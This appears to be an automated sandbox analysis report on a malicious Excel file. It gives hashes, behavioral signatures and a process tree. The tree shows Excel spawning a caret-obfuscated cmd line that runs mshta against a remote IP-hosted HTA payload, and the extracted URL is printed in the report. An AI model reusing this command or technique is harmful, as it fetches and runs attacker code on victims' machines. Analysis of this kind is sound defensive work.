Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 22:18
Behavioral task
behavioral1
Sample
3df88fd8cc94b643c0abce07b76576a2e4ac0304d9a1a6d4bbaa6bf60f6d7d47.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3df88fd8cc94b643c0abce07b76576a2e4ac0304d9a1a6d4bbaa6bf60f6d7d47.xls
Resource
win10v2004-20241007-en
General
-
Target
3df88fd8cc94b643c0abce07b76576a2e4ac0304d9a1a6d4bbaa6bf60f6d7d47.xls
-
Size
142KB
-
MD5
d889b0d126a586065548721f01fc92a7
-
SHA1
d4aa924bd0390658d4bf3bf7085406235e5df1e6
-
SHA256
3df88fd8cc94b643c0abce07b76576a2e4ac0304d9a1a6d4bbaa6bf60f6d7d47
-
SHA512
16e047fdc39057a5b8d889817c3d1cb1fbd2917c4b59877fd1ef6a9f323f68e8dbcf25255e38dfcd8b239a7abbd9c61900b11399d082b455a5ef5049ea878f1d
-
SSDEEP
3072:+5+nBqm9k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIMEvN8B/W6X1yxYovrepMUdQm:i+nBqm9k3hbdlylKsgqopeJBWhZFVE+g
Malware Config
Extracted
http://185.7.214.7/ve/ve.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2348 1820 cmd.exe 29 -
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 4 2340 mshta.exe 7 2340 mshta.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exemshta.exeEXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 1820 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid Process 1820 EXCEL.EXE 1820 EXCEL.EXE 1820 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid Process procid_target PID 1820 wrote to memory of 2348 1820 EXCEL.EXE 30 PID 1820 wrote to memory of 2348 1820 EXCEL.EXE 30 PID 1820 wrote to memory of 2348 1820 EXCEL.EXE 30 PID 1820 wrote to memory of 2348 1820 EXCEL.EXE 30 PID 2348 wrote to memory of 2340 2348 cmd.exe 32 PID 2348 wrote to memory of 2340 2348 cmd.exe 32 PID 2348 wrote to memory of 2340 2348 cmd.exe 32 PID 2348 wrote to memory of 2340 2348 cmd.exe 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\3df88fd8cc94b643c0abce07b76576a2e4ac0304d9a1a6d4bbaa6bf60f6d7d47.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\cmd.execmd /c m^sh^t^a h^tt^p^:/^/185.7.214.7/ve/ve.html2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\mshta.exemshta http://185.7.214.7/ve/ve.html3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2340
-
-